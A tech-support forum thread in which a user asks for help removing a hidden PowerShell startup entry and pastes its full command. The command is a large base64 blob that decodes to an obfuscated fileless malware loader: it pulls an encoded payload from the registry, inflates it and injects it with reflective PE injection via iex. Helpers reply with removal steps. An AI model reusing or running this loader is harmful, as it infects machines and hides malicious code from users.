mx6Sks1dEdXd3hWNVBkVlJHVmR6dExOdFd2aDhIYjhpcWt4L3VHWVJXNVJvZm51NHlKbE9Pd3ZYeXBPZ
zdONXg2N3FOQmxJb3h1QS81RmhydG1aSkp6cHh5U3diZ1crL0t6YWdJb1RaTGFTQXNMRUdrVkk2ckY3Y
zV2TCtuZzlSRlRPK2VydDBCdzJrSjVkZmhwckdLczRIL3pIdVFBZE1Wam5rS2xlSXo4NnYyTkJ5eXowd
TUzNGsyd293WDNML0F3Q1p4SGFoOFVZU2FLcmV5cXJ6Y0I5dkxNMForZmlxMjg2ZnUzQUd0dE9QMTRxe
m9aQ21vNm93VlJjQ2VpbFh1NkYxT0EvTlord240VDEwd0pRVURnVWpjVTI1SUNhQUVibGJ2azhPVHhHQ
1EydXJPWkVkN1RodlliQXJ6NWd4MkxHOFNRYUUvbVNTenY2WHhJbitwSkdxMjlPVHFMSEVGUFBIQ3hWb
DFZNkw2eDNXRTBtMWd0T3ExdU10YWVIOHBkdzVIdHk4WFdtcnkyakdRd0xmOFM3UzRRMTg2eU0vK2RVY
jZjb210aFo1R2lzajN2T1VScXNFVjVPSDl4dmJ5RFlFM0t2VzEycUc1OEs0M3p5dzNoNy9oeEErRlgzS
k9NZHhqNnlQOUE5emdEKzJhQ1ZmcTh6L3orTXNlZ21MOW1wcm51NWRwelJYY0t5WXZYT2FCUGtIenhsV
3AvUFNCcFdlbWtGbDJFSVBROVIxTitRWGdaNkE4WThwa3ZqNEdkRlRIS1lwRElMQ0RRWXl3ampxa21Za
3NIRHRidyt6YWFBT0xRZWcraUI5VHgzQlVtMUhZY0NhUncvSUxyU3Q0VTFpVTIrcXZmVWkvYXhLdG5LY
0tEdFdUK01PYUN5b1Baaml3SDl3TmdGb0VNbXoweEVwREhjY0F0VUtLdDZkZ2h6WmlMRjNIbFpGVk5WT
nNDYzJWeUp6NUlQcDdNUDdpa29ETld3SUpjWUcrYmNabVowcTBZVU1aK2pFTXl6L0FabmpqNE9GUnVsQ
XBhL3BuaFpxak96T0Zuc1UxcHlMc0VMZjlPN0tUaUg3L2xaR1JxVzlWUFk0RFo0NjkzazU3dExGbXVEV
FdJSXYxUDMzYmlSd1dEOGtnei9Od1JuZVoxaDBWRkhFR3V6UndZNEg5M3g3V2duTytTMW56MnpnVWdMY
VVwWFNKcE0zWnZtZUZlTjZRS3hhM2RISUM4V1AzY1BZWVdwRFNsMW1ZdFJid00yWlhsL094UmR6eGdhW
nlyL2pNSlRKbVdxam1BR1RPRjZvajlSWjl3L05reld6RTJTSlpFZ3BINjFyUFgxVzJuVDRIQVJGUks4Q
lBIdXdKd2cwQllwaFZ0OG9UZkdESlNKSkZ5dkJKV3pvVVFXMEFFNW5yNUs4cEFlT0NvQ0pvUGJLZ3hxY
nh0aFozb1dmVkhRN1NKRHI2SWVtM2FGaFVxUURHUm5pMmU0ODNCN2R6L0xVTmFHckh2Q3ZiTG9qYThzb
jc1aDZKMlA4VGtxMVBFV2dpS0x4bU1IOUJrd2xkNVJsR3ROUzFsOU92WUdHL1VseXdGNktQcUFIdFkvZ
3p2NlFYaXk4Z2Z0MkdwY3NFWUJreVZqeHlzUmpoOFhibGRuY3ZhZFM0dW1wdkpJQWpVYS9zOU1lVkRiN
U5HVWd5ZklxZE5zTmo2dDBiS0ZVaHJMVVRLeGRYbk9BT0xNdG9sYlVlelFXM0hWdWk4UGo0dWtGOVhvV
DdMQzZlaHkzVFhnMTBMS2NXOFVPZWhQRTFjWFN1bTVqdnJaekRueGFjVUNHOUlCQ0hpcDIxL3JWczRiN
2xhdnpNRW05d1A5RTh2ZHdOQVNHclMwd1ZyMStFQkFxZzh5RVJuR2FzZ0J1K3Rsdjd4am5aMGREMXJVW
kZLOW5aR2F0eXgyK1NjdzFsbEtsa3o4MXhjcjhwMXNQNUxvQUFNWlFFYXEvMmtwWEpWdS9QakNPc2ZKd
TEwNCszcnNnb3U3bWY3bldRY09PYWhMbkR6OE1veXEvcVAvanpGNDlXcnBIeWx6TndiUW1SbmJucXVkd
kRUVXFidERBaHhmd1ZjcDF3RTNUYTArMlREMjVRTEhvZms2bDcvYjhjWGc3OHM0N29iTUNOWlFqQUw3d
FlFdzI1V3hTNnRnTEE3QTc4K0xHc1kybzdQWDdHTnFPTlcrRWJ5cXlsUjQ4Y0REL2Y5OXBNTjZVckN2N
U9qZXViMEVmZVcrWDJRUGdlaUFQM0diTUh4Wm5zTEtOTGFyL2JyVEhxMEZKVVVJcHVobm14TnlhcTA5Y
mNtSXQ1TWFRY3owOUxRYUxhMU1qSFlGdm80RkF0b2J3cWtDd2lLV3JpdS9BRGt1ZFJiTHc0ZTJoYTA1N
nl0UzJnSWxtZFBOeGVrRTlVNXpML0lPYXAxWHBVR253MWpnRllUTVhkVW84NnE3cVlkdTAyMDFacGh2M
TNLUUE0a3BrOVJZYnNkSTNCYTRsQzVMakFqWkV3SG94a1h4eFY4TVo4YTloKzRveGsrK1RWNU1YN0ZUS
C9UT1EwMklmd3d4eWJIRVVFTDRiV0JCUWtveG9KbkFpSXordzY2YkFjSTIvOVpNZUExWDMzZ1N3Wm10R
Ud6QWdjTXY4RDc1WEFUeGd3Qmk2c3VBQ29vRldLRXBvdStrVFg0WThOc0U5SFB3UktBRjRhUmlIT05sQ
TBqdXp5S3RRQU1VVjN3M0F4SG5iUjg0OHYvc2tUN1pvNVViWS8vWXM4NWVoemt0YW52VUZWMzVpNjZZR
UtIbmxwQXFBNTVoRllnc2ZVSUlqTE1WUEcyZkJGN2kyNkp1dmdvbFdSMkhTUlBJYTNDV1d6NlpZNk1XS
0NTUjhrWFYxaGgwd1RDSzFObENvb3ByU2hDY2YvbzB1RG9CK1hiMUpCSDBrblBuREx1VUNKYnBBcWFkN
0xldzF0a0pScUMyY1kzQ0xuZGpBVlh5U1VhTUQvSWZqcVFvck9SelVkSFQwU2hvNVdHTko2YUUrUkMwW
GhjY0JFOEZFNlB6ZkZ4U0ZJMHNOemk2aWJ3TURxaGY4dWQ1Z214MWVYMC9QM1pzbzVGcWhJcXpTZkJsV
VFLbjMxcUZibjdxZWdYMldKZ3NZZEhOUWxXL204MzRETjcwQXNFYk1IcmM1TERsVmgrQkM1WXFYS3g2Z
VFNRWRsZFJwYmJFYW5KR2NiZFlWT2xyQjd3YTRtYnc1YlBOOU52NFFsc0JYUzRqRS9Pc2k0VVNKQ3dqd
FFkdXNsUnEyb3JOenNwY2xTQ1pMSXBIZXBwbnZaei9aN0xTU1VacjVyQkMyRkdSVjVudGxJdEU3SzZBV
WNXTzRzYlF4N2F5TENnRzdnemdWZXIyb2lvUkF2VTVmV2lGbGcvTHMyWGhIRjdSNG1sVmdiNDk0SENTQ
TQwSndONU1JV3NsUUMxRzFWYXB5RjFScjZqWGVHUEk3MFRwZTY2b0EvWWRhNW1jVXBFS1BQWWdQdUZkc
WJGYmxLdml1NGZWMGFhd2xzc3VXQmU4c1ZSVTN0Z2poai9PTjFubnVrR2plVUx3M0tJZlBTVWprUFQyQ
nZmbEo3SHhwd3ZyOFVGZFdSOStiNldBd3ZPV0pUWU1tWGRWbzE3RFVWZ3loSUd5TXRSYW9mcXZIU0dRL
zJoQUJONkcrekthUS9zMllkWWd2TUw3RU81Z2ltVkl0cWx1azF1R2hqSUZyZkxqN0JCRmNZUjg0akhjN
WVteHVFbmJFemgwNm15MzBWRG1TS0RsKzEyUzRFREhEbTVTOXRQZTRFYllPN0JSVWpzUEdWVU04dEp2N
1B6OEtEUEhHcEJ0aVdDMWZYN3lyWW1wekt1anBUREhTOEtSaFdCMEk4OGxYd29RVkRvazNKMlFqaDFxT
WV2ejdvRHZ4ZExFZlBhUFBJYkk4OGV1QkhsOEdhWEFldTBiV2NBTVhIQ3FJYXVxWGRTNG5PWkhrcUN2Q
1FTVVVjbWlCYmxQRnMvZDRUc3dxRllDRWNPVUJ4Q2pxVm15ZXcraXRJVW9QYnJjczg0TzJiSHNQYWRvN
jhiaEU3ZHZXNmtWY2FaM3FaelRIMU94bWRyaUY5T3ZyejZyVDVNdlluN2U1VmJCclZYaVhvczZPVlNnZ
HNZSGlkTGEvMWE2dU16YnpKYUFJYStVeG1iS1ZjWEVwbkZhTmc5b0hMV0RLc0tXUisxL0xvUXhiUDFiN
itPWUcrdDNRby9vMlRUVVJPdFpWWVRjaDVqcC9GZXBxemdyMXhha3J2elA0dmhzd1l1QVNGUnFyeEJNd
m9idUNnanQwZWFnQzNTSU1CMHFFR21hZGRKZnY3QnJTTWlTTEJrV1hSa0tLOU1xaXJTR29vclNHMTNLa
1pNek12S1pXUC9QTktHS1kzSzFrVzJ3OER2bC9tRS9FS2Y4SHdBcGcrODY3d1p2SmlYK2dSSnhwdnZPb
TYwdkdKNmxoZklMdFl1eXlPVFVZbVpUdlBqZ2NtZ1FGcXNIM0Y2dGtUcjVWQWxvOEs4ZDZ6RTdKc0NUd
DA1aTJuT1hqU3pnOVF3ZUh0WUQvR0FKa29pdm5ydi9wYUJibnpqdVo5RWFvd3VxQTVxQ09TZHdReEFFY
1R0ZzZhYUlrVHdiTzE1VEFsekpnQ0lFT1Y1Ym5xUTJqVjdKY0c2ZW9NTkNLVzlpVVlrQmZGSTAzRERsN
HM3QkNkY2wvUlJ2NFpnU3RWSDJQd0p4L1FvRzRCcFp2MGhFb3dSLzVHcDFQNSswMVhMTGgxSTZKRFFta
DNUWXUvaHdBeTR6T2d3TklNK0w3SklmcWUzTGxoY1M1MTAvLzBsUU05MVBCenlOb2hMU0M5dnF0QUd6a
nFoSXZBYThrbXF6SXFYckh2SWwwMFh3eGY2S04rQUtoZlJkdEMyT3ZTNEJha2Y4RmlPNGYxd2lBZ2dRW
XgxU29nMGlsS0dKVVd2NGh4SDJPc3NlTUd6VHNkRXhCcFlrc2pWVEpKYTNnWFJEcmtOcUUrOVVtMERhV
kxKV3FoWHRqRVpiZjZkbmhLTWhOa28wemdFbUg1YS9TNzRGZlJVNjVFUzhSUEUxbXpSQ1JDNjByU0pWb
HVCcnlWdW8rN2lNTm5KeE8rWGJabTZ5a2tjby9mb0IrMU00NFgvM2FCWDA1SUhMNWIwYzV1VzdFaU04V
0VGa25yNnlRZHpYTE80bWVZZVU5NlVnemcrRk5HODNPT2dYdG5LNmcxNmM3WDBPUHNDellGQ3BCTXdtb
XNrKzhvVlUrSHUzazg2K05EaHBadUhFeFBZeFpRVVpGdHQxWXJZK3BZNU8vamVzdFJvOEdjemkyaHRrQ
0dCTW1jdmdBY0Q5R1lkT0ZxZHFUdnpZbVRmS0M3a0VZU3plUStwQnR0SUJmZytodXRkeisxdnJJS29Ba
GxHaHR4bWNCQUlEeklOVzRxV3lmaEVYOTMrbmlNL1owcVpLUWtOQ2k2eWVHZ0grb2J0cTBkNkdqZXpKT
EdpaTVzdmRySmZ1M3BTZ05aSXMxVFYwdEdZU1E1WXNTSDJ2YTVqUEZvMVpsYlJjV2VhZXY5TkV0bis1U
W9TS212RVpzZG1wVnlIdEZBTk8xWDhrSjR3M2h3MDJEbnhsdE1NaHNLMGQvRVBoYWl2S1dnVW9tMlhJV
TVHdURMU0tJZEp3MktoMTEvOVNZUGs4Wko5blE1d2JFLytQZzdkc0xYV0sxUU1xSVdJMWxxeHFkeVpnT
TR3Y0tzU1B0VitMWk01ZTVOYkpaWlcxYW12TjdpQ2lLMXplUHdDMTMvZUs1N1ZEaEpoYmJPcWtLdm94c
G9qTGFUTTQ2RGF5eEhUS2docGd3UHl3N2lJYjVGVDlQRThCTzZ6b1UxM3pCMkw2OUVmTW1FM2tpemhYa
FU1UVNLcE9QbXIxTFBGNnI2c3Q4V1lvcXJxSHNjMGViUFFRby9qVXNCQ1JSV3VlODhINGx5SHlLaEswM
DdUL3dMQ3FiTWdadGc4YzF4cTEyaTdnRHlFRHl0N0svRUtNMk54QjVjS0ZBV2dNT3lqOC9BUTMzR1E3O
FFiMDRlWmpGckFhcEVoMWJlVnZQdFFBSkV0NmxocDFBcE1DeHk5SVJGWnE1L1dIUlpaS0lXR2MyYUdXd
FF6aUsxVWRaNkdFVUg0dllKNFZMcXJWbGJtdHJ5ZUxhUU1jeVhlOVFjQ2pQRWFRZ2hRY3lDV3ltZ3Rwc
XhQd3Vyc2V5MytoWVl2aW5hQTJkb0tpL2d5Q1RQTlZIYkU4S0gwV0hSdUVoUUcyZ0hleFMwOVJuRkw2Y
k9TdnJwVGVsRmsxY0lFYVoreU9IZG4vRjIyY1lUdk9laFRRYkpuR1luYWRNbnBuTlEwTFoxb2xpTEwyT
1VuNWFVWTlGa245eExTcERqQ2ZqZmlRSHptRHJoTEErUVVxTmZEc0tsbVYzUkg4aCtCTkNTKzFiaHV0S
URoZzJRU1gvUmRRQ1R6RVprNnRTZXY5UGxDQWxnT3o4ZkRwakhqWTN6YnlaMVA5amgrY3hsZ21uRjNFN
3ozL0dXcm5yNDZNRUlTYlpLVnIxMFd5ajVaM1hxSDcwZktreFgwb09KVEMzVFVpL3VoOG5Taml3SFdKN
kZhRHdHZ2ROQ0Z3bW9SRWV5MnRMd2xoUVlONlFFY3dvVExrdUtpWUltTGNzN3JjWlBEN0ZhcWoyTlBnK
3RUN1hhaVp5OXB2dWVDMHpScVdDRW5LalA1WGhpWkVuMUJhaTFQNHp5YlV4ZHh6akRLUXlMSDdTUUVTT
E5JY3V3S2R0VStONjZZSXYzclNzeThmd3pPMUU4eVJUT3FWOHQzTTl5ZGlCTnZrbGRvclRIQzdBb21PR
2V6N2JBeWUyWkVYcWhjZmRHKzV4bmN1eUZOa3dBL0JQMXZGM0k1M0IzN1U4OTdMZDlNeVFHQnB6N0VLU
GdZYnZoU2VKdzNhNjM5NG4yZTMxLzU1U2FXdlczOWJlL2RKdVpLcFNmUWVPcUVYa2NGZi9BL2hsWmpjS
09kSXVGM1ZhNkNvaXEvVnJ4K2h3d0hRcmlxS3FONitMaEVaYUNMcFdDODlLRGY3ZlplTHorOVc5YWQ5d
zEwSVRiV3BmSWJDaHE3cXQxMWxORWJaOTJTQ1lVLzJkek9hRU1JWVpJaTEvbUFta3c0azB1VUZ2MUM0U
2phT1JUcm42cS9od2N2RHJ3OVZKSW5IcE1Oc3Y1UDBNZkVBTlpudGw0dmx1KzVEZTBUSFNOSDZDUUhLZ
1duZmJsVHdSemRHcnRnYzhTbEp4N1RKTzR2RWpFTU0rT0dtNUdIRFBvM0wxOTRzUWNtVnVVSXVCYkg2N
jdEbVY5M0tYOE5UcHczQytNQUpXcGlLdmNzaDQ3akoxd0s1RE9HMk1aVnl4azRzbU1ZemI2Y2RpQ0JuV
1dIK0hsQ1YvUFZVMlhSdzluSXU5SHY0QzkvMEI1L0psenJja3dtRzFDRzJpTWhoem1ReGlkVTlJTGJOe
kx4S2pKQzg0L2lZRTBrVStPTFo3c1JGWDl2UkxDQlJXcTlEY2pjRDFKTTdOOXdwcXg4S2E0TFNmdldrK
293cU9weE05b3E4QzJjNittZHo2VDNXcEovRlI4RlRNN3AyWFczc0FQajJNVDlqbGtnU1pha3RsZlowR
mY3MFBSc3N0U3VVdnBNSmxHeCtBTlVTOFh5N3ZsWWdCRmZ6M0dkVUtUZ1MySGNhbUk0RGZpZ0ZlakhiW
XJhdmIrWVlKL2xzUWRLVGRFcVVzeU9kckpaWlZxL2RZWHRCaGJsWkxrRlFwWExVSG9MNmdYa3VKdjMyN
kdUbUR3RFYrRVhwSGJnMEI1TkhNSTh6aTUyOC8ydUdNV2pCQ3Z5bWNzMzRaZnRpUXBYUkRGMnBIS3Jaa
TdmMVZuRExaMkdMayt3a3FNK3FJQVJ0Zk1RaFlRRXpiZmlQNXhKT3g0b3psYWRWL2hpMVl1aytEY0tFT
DkxYlh4eUduZDM5d3h6ZjBjL3c5M0RTSWk3NkxGZCcpOw0KJGZhWW1nRmhSVW5uQVNSamdZID0gYlVYS
HFVbUprY0NCaCAtQUpMSVhGSUFITVlSRVBHWkRPS0cgJGZhWW1nRmhSVW5uQVNSamdZIC1hYkVZaHBoT
URoTSAkSGRGV1lTdm9yTEFVTHBTcA0KJGZhWW1nRmhSVW5uQVNSamdZID0gaW5mbGF0ZWJpbiAtQUpMS
VhGSUFITVlSRVBHWkRPS0cgJGZhWW1nRmhSVW5uQVNSamdZDQoNCiRSTFlIVlJGRENFU05QQlUgPSAnS
EtDVTpcU29mdHdhcmVcQ2xhc3Nlc1wnICsgJFFCQUZUU1VVT0hDWFRPQ007DQokTlNHUEluWG9EeVNjQ
3ZQVHEgPSAnJzsNCmlmIChbSW50UHRyXTo6U2l6ZSAtZXEgOCkgew0KCSROU0dQSW5Yb0R5U2NDdlBUc
SA9IChHZXQtSXRlbVByb3BlcnR5IC1QYXRoICRSTFlIVlJGRENFU05QQlUgLU5hbWUgJEdEWVdKV1BUT
U5QWFRFVldLTUopLiRHRFlXSldQVE1OUFhURVZXS01KOw0KfWVsc2V7DQoJJE5TR1BJblhvRHlTY0N2U
FRxID0gKEdldC1JdGVtUHJvcGVydHkgLVBhdGggJFJMWUhWUkZEQ0VTTlBCVSAtTmFtZSAkREdLVURPQ
UFHRkdIKS4kREdLVURPQUFHRkdIOw0KfQ0KJE5TR1BJblhvRHlTY0N2UFRxID0gYlVYSHFVbUprY0NCa
CAtQUpMSVhGSUFITVlSRVBHWkRPS0cgJE5TR1BJblhvRHlTY0N2UFRxIC1hYkVZaHBoTURoTSAkSGRGV
1lTdm9yTEFVTHBTcA0KIyROU0dQSW5Yb0R5U2NDdlBUcSA9IGluZmxhdGViaW4yIC1BSkxJWEZJQUhNW
VJFUEdaRE9LRyAkTlNHUEluWG9EeVNjQ3ZQVHENCg0KJGZhWW1nRmhSVW5uQVNSamdZID0gJGZhWW1nR
mhSVW5uQVNSamdZICsgJ0ludm9rZS1SZWZsZWN0aXZlUEVJbmplY3Rpb24gLVBFQnl0ZXMgJE5TR1BJb
lhvRHlTY0N2UFRxOycNCmlleCAkZmFZbWdGaFJVbm5BU1JqZ1k7
 

Someone...


Edited by jhefreyzz, 21 December 2015 - 08:47 PM.


BC AdBot (Login to Remove)

 


m

#2 Condobloke

Condobloke

  Outback Aussie @ 54.2101 N, 0.2906 W


 • Members
 • 5,642 posts
 • OFFLINE
 •  
 • Gender:Male
 • Local time:02:08 AM

Posted 21 December 2015 - 09:51 PM

Has it occurred to you that this is a valid Microsoft entry  ?.....Microsoft Operating System  Microsoft Corporation C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe


Condobloke ...Outback Australian  

 

fed up with Windows antics...??....LINUX IS THE ANSWER....I USE LINUX MINT 18.3  EXCLUSIVELY.

 

 

 

 

 


#3 jhefreyzz

jhefreyzz
 • Topic Starter

 • Members
 • 8 posts
 • OFFLINE
 •  
 • Local time:08:08 AM

Posted 21 December 2015 - 10:53 PM

yes

 

it directs to the powershell program when i open it. But I can't see the interface or the program its like in the minimized state#4 jhefreyzz

jhefreyzz
 • Topic Starter

 • Members
 • 8 posts
 • OFFLINE
 •  
 • Local time:08:08 AM

Posted 22 December 2015 - 06:21 AM

Need some help folks.
maybe someone can...#5 Condobloke

Condobloke

  Outback Aussie @ 54.2101 N, 0.2906 W


 • Members
 • 5,642 posts
 • OFFLINE
 •  
 • Gender:Male
 • Local time:02:08 AM

Posted 22 December 2015 - 08:28 PM

Approach this with Caution.

 

I would strongly advise you set a System Restore Point, before you start......

 

and also ensure you have a current Back Up

 

from THIS PAGE 

 

 

I found the link below...

 

https://gist.github.com/jakeballard/11240204


Edited by Condobloke, 22 December 2015 - 08:30 PM.

Condobloke ...Outback Australian  

 

fed up with Windows antics...??....LINUX IS THE ANSWER....I USE LINUX MINT 18.3  EXCLUSIVELY.

 

 

 

 

 


#6 jhefreyzz

jhefreyzz
 • Topic Starter

 • Members
 • 8 posts
 • OFFLINE
 •  
 • Local time:08:08 AM

Posted 24 December 2015 - 08:14 PM

hello sorry for the late response.

 

I don't mean to change the windows state of the powershell but I want rather to get rid off the startup item which is using the powershell to execute commands#7 Sintharius

Sintharius

  Bleepin' Sniper


 • Members
 • 5,639 posts
 • OFFLINE
 •  
 • Gender:Female
 • Location:The Netherlands
 • Local time:05:08 PM

Posted 24 December 2015 - 08:27 PM

Hi there,

Msconfig only temporary disables items, it won't remove the actual run entry itself.

Please run this to get a list of startup items on your computer.

Autoruns by Sysinternals

Please follow the instructions below to give me an Autoruns log containing your start-up entries:
 • Download Autoruns from here.
 • Extract the content of the Autoruns.zip folder on the Desktop.
 • Open the Autoruns folder, right click on Autoruns.exe and click Run as Administrator.
 • Accept the EULA on opening, then wait for all the entries to load.
 • Click on File, then Save and save the file to your Desktop.
 • Go on ge.tt and upload the Autoruns file you saved.
 • Please copy and post the download URL of your uploaded file in your next reply.
Regards,
Alex
0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users